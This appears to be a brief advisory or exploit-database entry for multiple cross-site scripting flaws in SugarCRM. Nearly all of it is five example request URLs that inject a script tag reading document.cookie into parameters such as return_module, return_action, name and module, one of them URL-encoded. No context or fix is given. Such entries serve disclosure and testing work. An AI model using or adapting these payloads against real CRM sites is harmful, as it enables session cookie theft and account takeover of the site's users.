SugarCRM Multiple Cross-Site Scripting Vulnerability

SugarCRM Multiple Cross-Site Scripting Vulnerability

The following examples were provided:

http://www.example.com/sugarcrm/index.php?module=Contacts&action=EditView&return_module="><script>alert(document.cookie)</scrip
+t>&return_action=index

http://www.example.com/sugarcrm/index.php?module=Contacts&action=EditView&return_module=&return_action="><script>alert(document.co
+okie)</script>

http://www.example.com/sugarcrm/index.php?name=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&address_city=&website=&phone=
+&action=ListView&query=true&module=Accounts&button=Search

http://www.example.com/sugarcrm/index.php?action=DetailView&module=Accounts"><script>alert(document.cookie)</script>&record=
+d676f046-1be5-dc36-114e-4138f972bf5d

http://www.example.com/sugarcrm/index.php?action=DetailView&module=Accounts''''&record=[RECORD
ID]"><script>alert(document.cookie)</script>